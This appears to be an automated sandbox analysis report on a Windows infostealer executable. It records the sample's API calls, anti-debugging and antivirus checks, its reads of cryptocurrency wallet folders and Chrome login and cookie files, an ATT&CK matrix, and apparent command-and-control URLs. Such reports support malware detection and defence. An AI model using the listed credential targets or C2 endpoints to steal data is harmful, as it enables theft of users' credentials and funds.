                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416500 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004118B0 _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416B10 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00411B90 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040BC20 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_strlen,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlen,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,CoInitialize,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00411DD0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041AFF0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040B190 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlen,_memset,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_004162F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00416770 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00409F60 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0040D1C0 _memset,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,lstrcpy,_strlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetLogicalDriveStringsA,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlen,
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00424430 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041F170 CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,
                    Source: C:\Users\user\Desktop\06625899.exeMemory protected: page guard
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0042A36A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0043139E _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00435F17 SetUnhandledExceptionFilter,
                    Source: C:\Users\user\Desktop\06625899.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\06625899.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\06625899.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetLocaleInfoA,wsprintfA,_memset,LocalFree,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00401090 cpuid
                    Source: C:\Users\user\Desktop\06625899.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\06625899.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                    Source: C:\Users\user\Desktop\06625899.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_00420120 GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,
                    Source: C:\Users\user\Desktop\06625899.exeCode function: 0_2_0041EDD0 GetUserNameA,
                    Source: C:\Users\user\Desktop\06625899.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
                    Source: 06625899.exe, 00000000.00000002.413121737.00000000031BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Windows Defender\MsMpeng.exe
                    Source: 06625899.exe, 00000000.00000002.412555113.000000000086A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\?
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                    Source: C:\Users\user\Desktop\06625899.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                    Source: 06625899.exeString found in binary or memory: \Electrum\wallets\
                    Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\ElectronCash\wallets\?*U/
                    Source: 06625899.exeString found in binary or memory: \Electrum\wallets\
                    Source: 06625899.exe, 00000000.00000002.412555113.00000000008DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: exodus.conf.json
                    Source: 06625899.exeString found in binary or memory: \Exodus\backups
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: info.seco
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: passphrase.json
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \jaxx\Local Storage\
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Ethereum\
                    Source: 06625899.exeString found in binary or memory: Exodus Web3 Wallet
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum"
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default_wallet
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: file__0.localstorage
                    Source: 06625899.exe, 00000000.00000002.413121737.0000000003160000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\MultiDoge\?}
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: seed.seco
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                    Source: 06625899.exe, 00000000.00000002.412969264.00000000025C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\06625899.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                    Source: Yara matchFile source: 00000000.00000002.412969264.00000000025C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 0.2.06625899.exe.2320e67.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.2320e67.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.06625899.exe.2380000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.3.06625899.exe.2380000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.06625899.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.412801899.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.355865725.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 06625899.exe PID: 7120, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts1
                    Windows Management Instrumentation
                    Path InterceptionPath Interception1
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services1
                    Archive Collected Data
                    Exfiltration Over Other Network Medium3
                    Ingress Tool Transfer
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Native API
                    Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                    Deobfuscate/Decode Files or Information
                    1
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    Exfiltration Over Bluetooth21
                    Encrypted Channel
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain Accounts2
                    Command and Scripting Interpreter
                    Logon Script (Windows)Logon Script (Windows)3
                    Obfuscated Files or Information
                    1
                    Credentials in Registry
                    3
                    File and Directory Discovery
                    SMB/Windows Admin Shares1
                    Input Capture
                    Automated Exfiltration11
                    Non-Standard Port
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)22
                    Software Packing
                    NTDS54
                    System Information Discovery
                    Distributed Component Object ModelInput CaptureScheduled Transfer4
                    Non-Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets41
                    Security Software Discovery
                    SSHKeyloggingData Transfer Size Limits115
                    Application Layer Protocol
                    Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials12
                    Process Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                    System Owner/User Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                    Remote System Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    06625899.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    https://freebl3.dllmozglue.dllmsvcp140.dllnss3.dllsoftokn3.dllvcruntime140.dll0%URL Reputationsafe
                    http://188.34.154.187:30303;0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/:0%Avira URL Cloudsafe
                    http://188.34.154.187:30303//0%Avira URL Cloudsafe
                    http://ctldl.windowsup30303/667e85c8112da056f901292caf82b3ed0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/addon.zip=u&y0%Avira URL Cloudsafe
                    http://188.34.154.187:303030%Avira URL Cloudsafe
                    http://188.34.154.187:30303/n0%Avira URL Cloudsafe
                    http://188.34.154.187:30303//1%VirustotalBrowse
                    http://188.34.154.187:30303/667e85c8112da056f901292caf82b3edZ50%Avira URL Cloudsafe
                    http://23.88.46.113/667e85c8112da056f901292caf82b3ed80%Avira URL Cloudsafe
                    http://23.88.46.113/667e85c8112da056f901292caf82b3edx0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/e50%Avira URL Cloudsafe
                    http://23.88.46.113:8A0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/T0%Avira URL Cloudsafe
                    http://23.88.46.113/667e85c8112da056f901292caf82b3ed0%Avira URL Cloudsafe
                    http://23.88.46.113:800%Avira URL Cloudsafe
                    http://188.34.154.187:30303/667e85c8112da056f901292caf82b3ed0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/CVOHV.xlsx0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/addon.zip0%Avira URL Cloudsafe
                    http://23.88.46.113:80/0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/0%Avira URL Cloudsafe
                    http://23.88.46.113:80peppppzxc.ziphttps://t.me/looking_glassbotlookataddon.zipMozilla/5.00%Avira URL Cloudsafe
                    http://188.34.154.187:30303/addon.zip&u;y0%Avira URL Cloudsafe
                    http://188.34.154.187:30303/addon.zip00%Avira URL Cloudsafe
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    t.me
                    149.154.167.99
                    truefalse
                      high
